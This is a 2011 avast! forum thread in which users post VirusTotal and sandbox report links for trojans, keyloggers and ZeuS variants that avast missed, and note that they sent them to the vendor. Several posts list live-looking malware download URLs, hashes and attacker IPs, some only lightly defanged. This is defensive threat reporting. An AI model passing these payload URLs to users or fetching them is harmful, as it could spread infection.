http://www.virustotal.com/file-scan/report.html?id=a83d7a0c90f0066840470cc82e5fe14e3626f90b49b42db83a0cec7cf72b2404-1313171873
http://www.virustotal.com/file-scan/report.html?id=919ee7a324f3631c4f104eb8b18a9587cd65a5ea6c5c3fa18a75311920ed58f8-1313173302
-
Another recent variant of this Gen:Variant.Renos.96 executable: http://www.virustotal.com/url-scan/report.html?id=455545b7d6ba1ace8273b20f6be550be-1313167837
Accompanying Anubis report: http://anubis.iseclab.org/?action=result&task_id=14cdffe97d5c00d34898e75d30b1b1048&format=html
See: http://camas.comodo.com/cgi-bin/submit?file=6e24ea2a39c54b350cc145700f154a9c6201b2d4cc02ebc43b5a3b9b5413a45f
reported to virus AT avast dot com
polonus
-
Trojan dropper not detected by avast:
http://www.virustotal.com/file-scan/report.html?id=5a7746eead66026c0cbea028cdfed76bbcd3d55125d25e5acc73303b67bfbc94-1313243176
See: http://www.threatexpert.com/report.aspx?md5=0be55123c40a8f4af0a355528551e306
and http://anubis.iseclab.org/?action=result&task_id=14e572957375b5c543db75b6e76ec98dd&format=html
reported to virus AT avast dot com
polonus
-
Hi forum friends,
This PSW.Generic9.HIA aka Trojan.PWS.SpySweep.52 not detected by avast: http://www.virustotal.com/file-scan/report.html?id=60ddaeb87503bb25977b96bfb44c5a619f200f72db665308f8dbca8acb38e0f2-1313330535
reported to virus AT avast dot com for added detection,
polonus
-
http://www.virustotal.com/url-scan/report.html?id=94986b54cc7a3a6e3abbd5f0b63a9bea-1313356410
Sorry if I'm wrong about it, I'm new to Virustotal.
-
http://www.virustotal.com/url-scan/report.html?id=94986b54cc7a3a6e3abbd5f0b63a9bea-1313356410
Sorry if I'm wrong about it, I'm new to Virustotal.
This surely has nothing to do with missed samples, e.g. files not detected and your VT results relates to a site check rather than a file ?
-
This surely has nothing to do with missed samples, e.g. files not detected and your VT results relates to a site check rather than a file ?
yea......but infected website is not detected
VirusTotal - html scan
http://www.virustotal.com/file-scan/report.html?id=009bdd5924e151b71cbaf5d3d37bc9bd7e6c3d0ccb0ccf300fd737be81b601a6-1313364210
-
Which again isn't a sample and not one which you can submit. Surely the whole purpose of this topic was/is to post the link and send the sample to avast for analysis.
Personally I still feel this topic a waste of time as there is zero follow up by the poster when the sample is detected. So you might as well cut out the topic middle man and just send it to avast.
Well going directly to the remote source (superpuperdomain.com/count.php) rather than the suspect origin site it becomes less and less clear cut, and would need to be reported to avast for further analysis. The script tag after the closing html tag is possibly where the suspicion is but Sucuri isn't to detailed on exactly what it finds.
See image of complete follow through from the script tag after the closing html tag (on all pages), to the final javascript file in the chain in adsshownow.com.
http://www.virustotal.com/file-scan/report.html?id=ff99d5233e40b1ba7e897172dacf3eae8fd436e3b65e251976ef5a7997f477d3-1313408365 (http://www.virustotal.com/file-scan/report.html?id=ff99d5233e40b1ba7e897172dacf3eae8fd436e3b65e251976ef5a7997f477d3-1313408365)
http://www.virustotal.com/file-scan/report.html?id=e0f41a7a5fca244e5d2f3c98a94a39d665f21cca86c89c90662d4f89deaffbaa-1313409355 (http://www.virustotal.com/file-scan/report.html?id=e0f41a7a5fca244e5d2f3c98a94a39d665f21cca86c89c90662d4f89deaffbaa-1313409355)
http://www.virustotal.com/file-scan/report.html?id=c15dd1360da706e839a14a224d4484b43bce90aaa1a7b01ba1aa9df87f16e39d-1313174208 (http://www.virustotal.com/file-scan/report.html?id=c15dd1360da706e839a14a224d4484b43bce90aaa1a7b01ba1aa9df87f16e39d-1313174208)
-
Facebook trojan missed
See: http://www.virustotal.com/url-scan/report.html?id=cb239244dc34713ace6ef1b04f61525c-1313837626
and: http://www.virustotal.com/file-scan/report.html?id=f13d7e4d0581c3797a6d3e4a32ee15b4889132b4b854f050d51efb0f075b73b2-1313845400
reported to virus AT avast dot com
polonus
-
Thanks for helping improving detection Polonus.
-
And this one, trojan not detected, see: http://www.virustotal.com/url-scan/report.html?id=0dd880b4802f5fdecd01bb5d82489473-1313863942
and
http://www.virustotal.com/file-scan/report.html?id=90d7cfe213e3b284572ffe97a258fd33524fc212f007f8bdf565d1a6a30ae6f0-1313871146
not found here: http://wepawet.iseclab.org/view.php?hash=0dd880b4802f5fdecd01bb5d82489473&t=1313871598&type=js
suspicious here: http://wepawet.iseclab.org/view.php?hash=19b0fe1cc91d2779f4762c8aec2eb34c&t=1313872016&type=js (avast detects as Win32:Malware-gen)
reported to virus AT avast dot com
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=953cadfb513f918a346d33515e928f5b-1314034094
and http://www.virustotal.com/file-scan/report.html?id=0259afbf7d09dc04b605cb379fa9f1d41801dcaecf722129b4c381aa7ba8b6f9-1314041844
Not detected by avast yet, also see: http://anubis.iseclab.org/?action=result&task_id=1e7ea79dfb6ffbee4b14069f6af09e177&call=first
reported to virus AT avast dot com
polonus
-
http://www.virustotal.com/file-scan/report.html?id=4a44b4445a4913ccff3df0a13f1fa7aec1e353970af38d2e833d78db121fc3cf-1315640051
(http://t2.gstatic.com/images?q=tbn:ANd9GcRkFQKGIHqyEo-HBmH6yeIoOTwjWqtY4YZqO12J9Zm37-qs8SyW)
-
hmmmmmm........Only the lonley :-\ did you upload the sample Burkoff ?......if not i have ;)
or is everyone wrong and avast! correct ?
sigcheck:
publisher....: Hades.net.cn
copyright....: Hades
product......: NBA 2K9 Mini Editor
description..: NBA 2K9 Mini Editor
original name: n/a
internal name: n/a
file version.: 1.0.0.0
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
Well ThreatExpert say:
Contains characteristics of an identified security risk. - Severity Level High
http://www.threatexpert.com/report.aspx?md5=d3d5f0c4d959cb24a9b9194213a7a146
-
Hi Pondus,
Or possibly it could not be executed: According to the Unix file command your file is of the following type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit.......
See: http://wepawet.iseclab.org/view.php?hash=381aae8fcce7f9f82278615c4d054d36&t=1315687363&type=js
& http://www.prevx.com/filenames/X461520440149902130-X1/NBA2K9.EXE.html
& http://siteinspector.comodo.com/public/reports/329355
Finally got anubis analysis via direct url scan:
http://anubis.iseclab.org/?action=result&task_id=144bac9e65818aaf415500f4821117490&format=html
polonus
-
Malwarebytes detect it as Virus.Alman
so i guess the detection is good......MBAM fp is rare
-
Hi Pondus,
Forwarded all info to virus at avast dot com, my friend. There still could be a remote possibility the protective Unix packer is being flagged by the rest of the "av pack", but I tend towards a non-detect more than to a FP.
Good we all helped out again and our initial thanks go out to Burkoff naturally for reporting this. Well, you could see, this non-detect blew his emoticon right out of proportion ;D
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=5a9486f19c2f21434130ef542ff57332-1316003623
See: http://r.virscan.org/4b95ea748e3582f7adf6b3d2bfc8a903
Avast does not detect this Fake AV? Spyware Preventer
http://wepawet.iseclab.org/view.php?hash=5a9486f19c2f21434130ef542ff57332&t=1316011037&type=js
See: https://safeweb.norton.com/report/show?name=junye.us
Here it is not being flagged: http://www.garyshood.com/virus/results.php?r=e74784f6379cbbf107b64fc99c4c7eb6
But found a high risk page here: http://siteinspector.comodo.com/public/reports/345610
reported to virus at avast dot com
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=87589ce08721ebaf557afcc4767018d7-1316094314
Missed variant of a variant of Win32/Kryptik.SVN
see: http://www.virustotal.com/file-scan/report.html?id=63f11e6373b489e0a44abd84d03c98a8307c5a09d2d14fa3ac1a0bede3e19588-1316101979
Also see Wepawet Scan: http://wepawet.iseclab.org/view.php?hash=87589ce08721ebaf557afcc4767018d7&t=1316102196&type=js (verdict suspicious)
and accompaning Anubis report: http://anubis.iseclab.org/?action=result&task_id=1695760ed51c6881445779f1ebb3a872f
Now added to avast detection,
polonus
-
Hi, polonus
NBA2K9.exe No added ! ??? ::)
China url block.
-
Hi Burkoff,
Do you have a MD5 hash of this variant, normally it is seen as safe: http://www.prevx.com/filenames/X461520440149902130-X1/NBA2K9.EXE.html
Well if you mean MD5 d3d5f0c4d959cb24a9b9194213a7a146 , well it is classified malware;
avast does not have detection for it yet: http://www.virustotal.com/file-scan/report.html?id=4a44b4445a4913ccff3df0a13f1fa7aec1e353970af38d2e833d78db121fc3cf-1315640051
polonus
P.S. If you have a block there, you could always go via the google cache file to get to the results,
D
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=65a312b1fa70fa9d2d5a0049f7283f40cb5232855b2408504b4c88a06e50b3d3-1316732404
-
Not detected:
http://www.virustotal.com/url-scan/report.html?id=47575a05cc9aaa764fe5aa8204914a82-1316787750
&
http://www.virustotal.com/file-scan/report.html?id=9fc5b93e2dcd221f55b9c852b0dda00ebac5df170bca0c7f2db03d0b46e18de3-1316794954
see: http://siteinspector.comodo.com/public/reports/366456
analysis: http://anubis.iseclab.org/?action=result&task_id=1cd8971cb9a4e4cc42d62c7c50b94135f
polonus
P.S. Consider to check against: http://www.backgroundtask.eu/Systeemtaken/taakinfo/22396/spotify.exe/
-
http://www.virustotal.com/file-scan/report.html?id=a27944ab233975b0d36c8306dceeebeb1ceda67fd1bf50691ebcf61cc1f9445b-1316799765
ZEROACCESS ROOTKIT!
-
If you haven't already done so send the sample/s to avast as a Undetected Malware:
Open the chest and right click in the Chest and select Add, navigate to where you have the sample and add it to the chest (see image). Once in the chest, right click on the file and select 'Submit to virus lab...' complete the form and submit, the file will be uploaded during the next update. Note: manually adding to the chest doesn't remove them from the original location, so they still have to be dealt with in that location.
Or
Send the sample to virus (at) avast (dot) com zipped and password protected with the password in email body, a link to this topic might help and false positive/undetected malware in the subject.
-
As DavidR says in his reply the malware should be reported to virus AT avast dot com before posting the VT (non)-detection link here, so a sample should be sent for avast analysis first.
If a MD5 hash exits other reports could be helpful, as in this case these scan results came up: reported 3defcb296fef1ac8a2c78ba83ff6bb07 = http://camas.comodo.com/cgi-bin/submit?file=a27944ab233975b0d36c8306dceeebeb1ceda67fd1bf50691ebcf61cc1f9445b&iframe=
Malware reported:
Thu, 22 Sep 2011 18:29:55 +0200 MD5: 3defcb296fef1ac8a2c78ba83ff6bb07
SHA1: fa98a481e32bf1c0d10b30e01ba8d64f78241341 0/43 (0%)
2011-09-22 16:10:54 (UTC) DrWeb detects as Trojan.DownLoader4.61543
Also take care to follow up and check the VT link afterwards for avast added detection. If not it could mean the malware is no longer available, e.g. up and alive (happens a lot, because malcreants are ready to comply with complaints when filed or malware is found up and then they migrate their malcreations out somewhere else, even hopping bulletproof servers on all continents and high seas) or the malware should be reported again or is found not to be genuine malware. This is another reason to get hold of a sample and send that to virus AT avast dot com....
polonus
-
Hi Flash999,
Avast now has detection: http://www.virustotal.com/file-scan/report.html?id=a27944ab233975b0d36c8306dceeebeb1ceda67fd1bf50691ebcf61cc1f9445b-1316842762
@JuninhoSlo
http://www.virustotal.com/file-scan/report.html?id=65a312b1fa70fa9d2d5a0049f7283f40cb5232855b2408504b4c88a06e50b3d3-1316872770
So you see the results of your contribution here.
Well, thanks for helping towards avast detection here,
polonus
P.S. And detection for a non-detect I reported. Thank you, avast:
http://www.virustotal.com/file-scan/report.html?id=f13d7e4d0581c3797a6d3e4a32ee15b4889132b4b854f050d51efb0f075b73b2-1315480743
D
-
Malware not detected: http://www.virustotal.com/url-scan/report.html?id=67d13f4f1935b57232f9e608ccb1b797-1316946995
Found safe here: http://urlquery.net/report.php?id=3531
Bundle.php; these bundles can open both their own malware code as well as the desired real application whilst conserving the look and feel of the real data....classtype: trojan-activity,
polonus
-
Not detected by avast:
http://www.virustotal.com/url-scan/report.html?id=1824e7b0824027d9c2216e5931e6a15e-1317120057
and
http://www.virustotal.com/file-scan/report.html?id=f3c44f46ce20e60cf5fd5a30333ed748ef831ddcf675758428a9655c2eb1493d-1317127265
See: http://www.threatexpert.com/report.aspx?md5=a388dc7bc083bd22d3dec5520a29fc6d
infected with Trojan.AVKill.2
see: http://anubis.iseclab.org/?action=result&task_id=14d685be4054f05544db5f8a9e7792661
Nice with this Anubis Analysis is to search here for entities,
for instance because of this found in Reg Values read:
HKLM\SOFTWARE\CLASSES\MIME\DATABASE\CONTENT TYPE\IMAGE/X-WMF Image Filter CLSID {607fd4e8-0a03-11d1-ab1d-00c04fc9b304}
then we find:
http://www.internetsecurityzone.com/Entities/?_{607fd4e8-0a03-11d1-ab1d-00c04fc9b304}
CLSID leads to "NPROC SERVER: %SYSTEM%\mshtml.dll",
pol
-
Not detected by avast or FP where flagged: http://www.virustotal.com/file-scan/report.html?id=3811522f704444686fe58c885344ed195286fc09c377b38c69976380e5b6a6f6-1317136844
&
http://www.urlvoid.com/scan/management-training-development.com
Heuristic find, see http://www.garyshood.com/virus/results.php?r=4460691f639bc71530c55a828774e6e1
polonus
-
Detection for TR/PSW.Zbot.Y.2324 missed by avast:
http://www.virustotal.com/url-scan/report.html?id=a95e38d958044850175682c7c0023386-1317290733
and
http://www.virustotal.com/file-scan/report.html?id=02d5366226ad3e3ffd4ebba68041d3e6974d572cc23b4186ceb0d1112f3af33f-1317298629
polonus
-
Undetected malwares
1: http://www.virustotal.com/file-scan/report.html?id=dbb301c77256fe5f006916f502408d6dfcdead60030885e26d0f27a265497809-1317567623
2: http://www.virustotal.com/file-scan/report.html?id=b4b102e6771c0f1c1d32b4d44b1a7aee57fa4db4c1fb86b0ed4b408e606b1fb4-1317568668
3: http://www.virustotal.com/file-scan/report.html?id=eb2ea828e0bd71a2ca83ec380cfadfe014ed24f0d511634580af72f048daf300-1317569198
-
Undetected malwares
1: http://www.virustotal.com/file-scan/report.html?id=dbb301c77256fe5f006916f502408d6dfcdead60030885e26d0f27a265497809-1317567623
2: http://www.virustotal.com/file-scan/report.html?id=b4b102e6771c0f1c1d32b4d44b1a7aee57fa4db4c1fb86b0ed4b408e606b1fb4-1317568668
3: http://www.virustotal.com/file-scan/report.html?id=eb2ea828e0bd71a2ca83ec380cfadfe014ed24f0d511634580af72f048daf300-1317569198
1: I think it is false positive
2: OK
3: ??? looks like infection
-
1: I think it is false positive
maybe.....but sure looks suspicious
First seen: 2011-10-02 14:26:45
Last seen : 2011-10-03 12:22:53
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=238a885c0721551c23b9bd3f8a17f5db5cf1fde6a6ccf4c50336be36c3899c81-1317767024
-
http://www.virustotal.com/file-scan/report.html?id=b5bb33c3d08e98d3ab4c01fbc86894d5de4e40dcdbde49c7111193fd37326a46-1316718030
Trojan?
-
Posting VT results here will not help unless you also upload the samples to avast.....did you?
-
sorry guys :'(
if i am doing things wrong....i dont know much just want to help!
I am just a compulsive tinkerer who has been watching this forum from past 1 week...i am a avast! user no doubt...i just love avast! 8)
-
I will try and get some samples from Malc0de...
-
I will try and get some samples from Malc0de...
First, thanks for trying to help..! :)
But be very careful, if you are not sure how to do this, it's better to stay away. ;)
-
Not found Trojan-PSW.Win32.Kykymber.ajbc - see: http://www.nictasoft.com/angel/md5/07694F50E98C1D8406E70A8002D9F7B0
see: http://www.virustotal.com/file-scan/report.html?id=67054abbff844da60f546064d484f09aacf658cc9a78b13b1e6b7bc70301476e-1319134424
Nothing here: http://wepawet.iseclab.org/view.php?hash=0008c26da3a22394da5967cae423368b&t=1319366553&type=js
and nothing here:
http://vscan.urlvoid.com/analysis/2a15fe4e164249efc7e130e5f635913e/cGFjaw==/
polonus
-
Not found Trojan-PSW.Win32.Kykymber.ajbc - see: http://www.nictasoft.com/angel/md5/07694F50E98C1D8406E70A8002D9F7B0
see: http://www.virustotal.com/file-scan/report.html?id=67054abbff844da60f546064d484f09aacf658cc9a78b13b1e6b7bc70301476e-1319134424
Nothing here: http://wepawet.iseclab.org/view.php?hash=0008c26da3a22394da5967cae423368b&t=1319366553&type=js
and nothing here:
http://vscan.urlvoid.com/analysis/2a15fe4e164249efc7e130e5f635913e/cGFjaw==/
polonus
hХХp://zerbilisim.com/patch//pack/
hХХp://zerbilisim.com/patch//pack/troy.exe
hХХp://zerbilisim.com/patch//patch.exe
http://online.us.drweb.com/cache/?i=50ef4246150d7b2342a55b9436595310
http://www.virustotal.com/file-scan/report.html?id=6680d01f92c1426ca3aa5d4930c452cfc7bb079425431c140f76eb2cee581184-1319367455
http://virusscan.jotti.org/ru/scanresult/f90c010e12a9c0b9366e79d57d8b0a96856f69df
-
Hi Dim@rik,
Certainly a malware site: http://www.virustotal.com/url-scan/report.html?id=eff2622252021746e44c3e64802486a6-1319381223
Thanks for your further evaluation.
But avast does not detect: http://www.virustotal.com/file-scan/report.html?id=92200560416ccbd1f9f4ac23a9ab3df4ce31fbb6587ca410ba49a159869ee428-1319154103
But I hit at these results: http://www.virustotal.com/file-scan/report.html?id=67054abbff844da60f546064d484f09aacf658cc9a78b13b1e6b7bc70301476e-1319134424
Not found by DrWeb as it does not unpack the ASPACK packer: http://online.us.drweb.com/result/?lng=en&chromeplugin=1&url=http%3A%2F%2Fzerbilisim.com%2Fpatch%2F%2Fpack%2F
else it does find it as you have shown: http://online.us.drweb.com/result/?lng=en&chromeplugin=1&url=http%3A%2F%2Fzerbilisim.com%2Fpatch%2F%2Fpack%2Ftroy.exe
also: http://vscan.urlvoid.com/file/07694f50e98c1d8406e70a8002d9f7b0/dHJveS1leGU=/
http://urlquery.net/queued.php?id=5867
= virusname: Trojan-PSW.Win32.Kykymber.ajbc found at ip: 46.45.136.234
from Istanbul - previous at -http://privategoldtrader.com/templates/beez/
and before that at =http://privategoldtrader.com/templates
MD5 hashes resp.: md5: 0209aa4baab3df392e487bb7d5f538a6 (the one I reported)
md5: 0209aa4baab3df392e487bb7d5f538a & md5: 3dd46205274955be03c2e8e4674011ea
Normally avast should have a good score for this malware with 34.02%
polonus
-
Hi Dim@rik,
Not found by DrWeb as it does not unpack the ASPACK packer: http://online.us.drweb.com/result/?lng=en&chromeplugin=1&url=http%3A%2F%2Fzerbilisim.com%2Fpatch%2F%2Fpack%2F
else it does find it as you have shown: http://online.us.drweb.com/result/?lng=en&chromeplugin=1&url=http%3A%2F%2Fzerbilisim.com%2Fpatch%2F%2Fpack%2Ftroy.exe
polonus
That's right ... this path directory where there are viruses.
hХХp://zerbilisim.com/patch//pack/troy.exe
hХХp://zerbilisim.com/patch//patch.exe
Send to Avast.
-
Hi Dim@rik,
Site Inspector's cloud detection has it also: http://siteinspector.comodo.com/public/reports/463988
& while this one is missed by it: http://siteinspector.comodo.com/public/reports/464884
I reported there,
polonus
-
undetected malwares
1: http://www.virustotal.com/file-scan/report.html?id=2b601b9b309a1c173f34fb9dcbcd9391a1b1c692a615c1e02747d8adb27b1b09-1319476939
2: http://www.virustotal.com/file-scan/report.html?id=8a68cff52f13b825062bb53f27428f4fe85bdfbbd07550487b0777bb0af972ad-1319286992
3: http://www.virustotal.com/file-scan/report.html?id=bd31db0b57939d330032579515b1b70b9717819ef8fecff566df0597b199d982-1319480831
-
JuninhoSlo, did you send the samples to avast? Otherwise they cannot improve detection of those ones.
-
JuninhoSlo, did you send the samples to avast? Otherwise they cannot improve detection of those ones.
Of course ;)
Via:
- Email
- Chest
- http://www.avast.com/en-eu/contacts
-
Sorry to have asked. Thanks for improving detection.
-
Sorry to have asked. Thanks for improving detection.
It,s OK ;) Thank you :D
-
Hi JuninhoSlo,
There are more versions of that possible malware, see: http://f.virscan.org/Freesimser.exe.html
Did you follow up all of the various MD5 hashes to see if avast has detection for this
PE32 executable for MS Windows (GUI) Intel 80386 32 Some were given as VT goodware detetcions?
87ed1485cd9b0d2ca0c4ff033a16d37f
see: http://reports.antivirus-lab.com/10300/malwarewin32-generic-96/
459c5b2c63ec309789e3a7d0a0c170e0
c1406b68d70a59f059fec3d2d21adbb4
ecb1e6433d78850ade10ad8746f053a8
see: http://www.threatexpert.com/report.aspx?md5=ecb1e6433d78850ade10ad8746f053a8
d0375ea1f89f2a60dd4b8c0bd0783af7
http://r.virscan.org/8827b020c49ac0821e458a55d5d8a8b5
http://www.virustotal.com/file-scan/report.html?id=2742e12f906ec5c13bb57cf3feac314bd6deed6deda9a3200eb2df0e38c35851-1306013342
McAfee 5400.1158 6282 2011-03-11 PWS-SpyEye!env.a
polonus
-
Not detected by avast ZeuS Binary: http://vscan.urlvoid.com/analysis/542e9f10caffc69c2ed97db102b6e04a/Ym4tZXhl/
Analysis: http://anubis.iseclab.org/?action=result&task_id=13dc0cdf93d100f742d1557612e5b682a&format=html
reported to virus AT avast dot com
polonus
-
Another Trojan-Spy.Win32.Zbot.biwp detection missed...
Why not detected here: http://www.virustotal.com/url-scan/report.html?id=45666eb9e46b4d1c7f68a0786630a878-1319886530
http://www.virustotal.com/file-scan/report.html?id=8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb-1319894039
See: http://urlquery.net/queued.php?id=6539 = 0/39 (0.0%) Trojan-Spy.Win32.Zbot.biwp http://www.threatexpert.com/report.aspx?md5=c33a3b5f4fb8bd991aae89fc83362cc7 and see:
https://zeustracker.abuse.ch/monitor.php?host=moneyindahouse.com
likewise on that IP 60.19.30.135 we have/had: http://malc0de.com/database/index.php?search=60.19.30.135&IP=on
Reported to virus AT avast dot com,
polonus
-
Avast misses PHP/IRCBOT.E.29297, see: http://www.virustotal.com/url-scan/report.html?id=690874991353a45b81c54a9898c268f3-1320075080
and http://www.virustotal.com/file-scan/report.html?id=72647d00b6a72a09b90420324bc6fa874d093692bab91200cea982df85c24cde-1320078981
/fighter script - Rema [baby]-IRC-[BOT] Decoded Files
494e/d639826fadb0d1dd6457be70593d9e090a15 from -myheart82 dot waphall dot com/war.txt
Also see: http://urlquery.net/queued.php?id=6653
reported to virus AT abast dot com
polonus
-
Generic25.BCJW missed by avast: http://www.virustotal.com/file-scan/report.html?id=cb6e91036a082b049bcb914fe031ac41210758ffb38aca8bda36c639c6349b59-1320164120
See: http://anubis.iseclab.org/?action=result&task_id=1d58b9a09bdda1e349d5dc550556ad882
see: http://urlquery.net/queued.php?id=6908
compare: http://www.threatexpert.com/report.aspx?md5=19a418e0400d554dda9b54520bdf52b4
polonus
Now detected by avast as Win32:Malware-gen
D
-
http://www.virustotal.com/file-scan/report.html?id=2522c0ef1cb72c42e1250975ad511e165d4054a4fabf95f88b38cdb3e55e3966-1320252829
Keylogger. Sent it through the chest 3 days ago, still undetected.
-
Detetcion missed: http://www.virustotal.com/url-scan/report.html?id=9d56c843261e819a7c745fcb6ab1d987-1320267352
and
http://www.virustotal.com/file-scan/report.html?id=0a88dd2f44b1c44f6d0e1470c7e1d018254f0d939f8b25fe10e08a73d7bdca6e-1320270960
See: http://anubis.iseclab.org/?action=result&task_id=11c954aee33e985e4c54f34891d9dee41
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=e1b3354a989a393c9b59a70f91683e4d-1320323964
FileAnalysis: http://www.virustotal.com/file-scan/report.html?id=b33d05f518f91280b692f0ac9db98042280af301d40ae9226360ec38ff2860a5-1320327855
See: http://urlquery.net/queued.php?id=7141
Checking with DrWeb's online url checker: -http://sydneymoon.com/legal.html
Engine version: 5.0.2.3300
Total virus-finding records: 2734855
File size: 3928 bytes
File MD5: 66a4e5fddbce8e70968e49e5a1ffc84f
-http://sydneymoon.com/legal.html - archive HTML
>-http://sydneymoon.com/legal.html/Script.0 infected with Trojan.DownLoad.3140
reported to virus AT avast dot com by
polonus
P.S. There is also a request for GET /tgpx/ HTTP/1.1
Host: -vsebudetzaebis.org Threat see: http://wam.dasient.com/wam/infection_library/681b58b5ed26350b6af5d2dbc224cedc/vsebudetzaebis
Damian
-
Not detected by avast, see: http://www.virustotal.com/url-scan/report.html?id=bf3c5387ab299a2637a69bbefe4ad6f2-1320505950
File analysis: http://www.virustotal.com/file-scan/report.html?
id=bca3f956f79168b3fb9d45575a3297fbde77d82fbca42bc0eabc528e0d5f71a6-1320509859
&
http://r.virscan.org/c664fe9cf23bcac71b02f185e11c11dc
Suspicious: http://siteinspector.comodo.com/public/reports/581239 as with BL2, detected distributing of malware, exact find Trojan.Win32.VkHost.bvg (kaspersky)
polonus
-
Non detected Trojan downloader
See: http://www.virustotal.com/url-scan/report.html?id=06e7a3fee5f284a7b953d8e079977ebe-1320506794
See: http://www.virustotal.com/file-scan/report.html?id=84ceb3c87dce08fbab3a9563d4185df4464a56ef0c02e1a8949b2b1504ffe48f-1320510684
See: http://anubis.iseclab.org/?action=result&task_id=1cfaa5ba804f491a439fb8d78b69895ac
also see: http://www.virustotal.com/file-scan/report.html?id=84ceb3c87dce08fbab3a9563d4185df4464a56ef0c02e1a8949b2b1504ffe48f-1320510684
for download03112011.exe
reported to virus AT avast dot com,
pol
-
Not detected by avast, see: http://www.virustotal.com/url-scan/report.html?id=bf3c5387ab299a2637a69bbefe4ad6f2-1320505950
File analysis: http://www.virustotal.com/file-scan/report.html?
id=bca3f956f79168b3fb9d45575a3297fbde77d82fbca42bc0eabc528e0d5f71a6-1320509859
&
http://r.virscan.org/c664fe9cf23bcac71b02f185e11c11dc
Suspicious: http://siteinspector.comodo.com/public/reports/581239 as with BL2, detected distributing of malware, exact find Trojan.Win32.VkHost.bvg (kaspersky)
polonus
Your request has been processed by an automatic system. Sent you the file is located in the base of trusted (clean) files Dr.Web and not a threat.
File: Darksiders_v1.0___10_Trainer.exe
MD5: 3f5b547fbb2b9f3e835f3db3a779a7c6
-
Hi Dim@rik,
Well about the detection. It should rather be flagged as a PUP. Maybe DrWeb and avast have different views on the PUP status of this one than for instance other av solutions that flag it,
polonus
-
Avast does not detect TR/Gendal.35840.BR here, see: http://www.virustotal.com/url-scan/report.html?id=d31ed123849d17fb93a6ac24bc7c7b03-1320616157
and
http://www.virustotal.com/file-scan/report.html?id=e8533282e38abebbbf07a7da25594fea5e1c5e165c907f2a3551e7ebc907f856-1320620041
polonus
-
Not detected: http://urlquery.net/queued.php?id=7578
See: http://www.virustotal.com/file-scan/report.html?id=fc5c5ee368f446ea420f97be60fcc140624a1d14ef5f9b3f1d08bd4fef3cea80-1320664388
Infected with TrojWare.Win32.Trojan.Agent.Gen,
Suspicious: http://wepawet.iseclab.org/view.php?hash=361014083ccb4c04a85d415702e034dc&t=1320671503&type=js
polonus
-
Not detected: http://www.virustotal.com/file-scan/report.html?id=040b71dbc9b756a1053fdf93513f8bc2d7154a27a6ea9e58da31e173ac45bed3-1320699561
sample sent.
-
Thanks chabbo for improving detection.
-
Backdoor trojan not detected by avast:
See: http://www.virustotal.com/url-scan/report.html?id=851e64f4641f6bd8f5b9975193ecbff1-1320928604
See: http://www.virustotal.com/file-scan/report.html?id=60cee08a156021bbccaf0398dc87b48338591248c2875e49f286d6e32b29f264-1320932212
See BL3, detected distributing of malware (PHP/C99Shell.F)]: http://siteinspector.comodo.com/public/reports/608642
reported to virus AT avast dot com,
polonus
-
fake AV.
http://www.virustotal.com/file-scan/report.html?id=631a7cd023ae4d5295607f8cc0c21bb7d3048fb09cc3885de9fb34ee9a106ddd-1321051547
avast got sample 1 day ago still no detection,
-
Well here some find it safe: http://f.virscan.org/vclean.exe.html
Here it is seen as a dropper: http://www.prevx.com/filenames/1272200888907706236-X1/VCLEAN.EXE.html
Here it is not trusted: http://isthisfilesafe.net/sha1/29D50A116011FF0C317AC552F35E7CF2E1EAA242_details.aspx
polonus
-
Trojan-dropper or SPR/Tool.RDPBrute.241664.1 not detected by avast
See: http://www.virustotal.com/url-scan/report.html?id=a82b8cdf97b450e9c112d42c5a880d4f-1321046352
and
http://www.virustotal.com/file-scan/report.html?id=9fd83c6aadf764dded4effa3a2926a2c02269da04dd748cd90caaea92c6e5440-1321052723
See: http://www.threatexpert.com/report.aspx?md5=aaaaa7e2a9a7c93747df905fd1488406
polonus
-
http://www.virustotal.com/file-scan/report.html?id=4ea942bca8c6763964c64b4fb0f77f378b3251fdb650ec0ca8be87d93abbacfd-1321047395
http://www.virustotal.com/file-scan/report.html?id=b47d5e832843f4910560216f9b49b34d5bc1911ebb5cf59e5705c052b6e22f11-1321121282
http://www.virustotal.com/file-scan/report.html?id=50482d07dbd2004aa05cc6f44b64d5f136b53b6cec9b2692c22a2e6b3e486b27-1321121178
http://www.virustotal.com/file-scan/report.html?id=b47d5e832843f4910560216f9b49b34d5bc1911ebb5cf59e5705c052b6e22f11-1321121282
http://www.virustotal.com/file-scan/report.html?id=375383b7f08e88713be5cb0febaa1d073f4c59fd1db98743a1718d7564a772f0-1320953150
samples sent to avast! by dim@rik
refer:
http://forum.avast.com/index.php?topic=88283.0
-
The links you gave in another posting were not all checked against the webshield.
This one was rightlt detected and blocked by the avast webshield as URL:Mal
-http://adensity.com/facebook-pic-
Most other links you gave there were flagged by DrWeb's URL Checker
-http://sandhuforgings.co.uk/images/1.exe infected with Trojan.DownLoad2.42876
-http://sandhuforgings.co.uk/images/had.exe infected with Trojan.DownLoader5.5922
-http://sandhuforgings.co.uk/images/dd.exe infected with Trojan.DownLoader5.11806
-http://familytindoor.net/stat/081111.exe infected with Trojan.PWS.SpySweep.52
polonus
-
familytindoor.net/stat/081111.exe
http://www.virustotal.com/file-scan/report.html?id=50482d07dbd2004aa05cc6f44b64d5f136b53b6cec9b2692c22a2e6b3e486b27-1321121178
not yet detected :'(....
-
familytindoor.net/stat/081111.exe
http://www.virustotal.com/file-scan/report.html?id=50482d07dbd2004aa05cc6f44b64d5f136b53b6cec9b2692c22a2e6b3e486b27-1321121178
not yet detected :'(....
This VT scan is two days old ;)
-
This VT scan is two days old ;)
thanks i hope it is detected ::)
-
This VT scan is two days old ;)
thanks i hope it is detected ::)
Did you send the sample to Avast..??
-
samples sent to avast! by dim@rik
refer:
http://forum.avast.com/index.php?topic=88283.0
-
please send this for me....thanks! :-*
http://www.virustotal.com/url-scan/report.html?id=691a4b0ecc3a1f95fdf7178cbd1ae1e4-1320816656
